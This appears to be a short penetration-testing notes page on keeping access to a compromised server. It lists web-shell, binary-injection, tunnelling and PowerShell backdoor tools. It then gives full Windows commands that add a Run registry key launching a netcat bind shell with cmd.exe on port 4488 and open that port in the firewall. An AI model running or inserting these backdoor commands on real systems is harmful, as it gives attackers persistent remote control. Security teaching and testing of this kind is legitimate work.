Weevely
https://tools.kali.org/maintaining-access/weevely
Erzeugt PHP-Skript auf Server, mit dem man eine Shell wieder bekommen kann.
Various scripts
- In Kali:/usr/share/webshells
- https://github.com/backdoorhub/shell-backdoor-list
Shelter (win32)
Dynamic shell injection tool into normal Windows binaries.
https://tools.kali.org/maintaining-access/shellter
Create own (normal) shell
- Create a open shell via netcat.
- Create a open shell via dbd (https://tools.kali.org/maintaining-access/shellter)
HTTPTunnel
Needs PHP; creates file on a server which acts as SSH proxy.
Nishang
Collection of PowerShell scripts for backdoors and more.
Kali:/usr/share/nishang
dns2tcp
Creates a TCP tunnel via a DNS server.
psexec
Use psexec from Impacket to create a regularly running script.
Windows
Autostart nc
- Upload nc to the server (e.g. from /usr/share/windows-binaries/nc.exe)
Set the autorun registry entry:
REG ADD HKLM\software\microsoft\windows\currentversion\run /v “nc” /t REG_SZ /d “C:\Users\w7vm\Desktop\nc.exe ‑Ldp 4488 ‑e cmd.exe” - Add a new firewall rule
netsh firewall add portopening TCP 4488 “Service Firewall” ENABLE ALL - Double check that the rule is active now
netsh firewall show portopening
Warning: Could be that Windows shows a confirmation popup on starting before starting nectar.
Leave a Reply
You must be logged in to post a comment.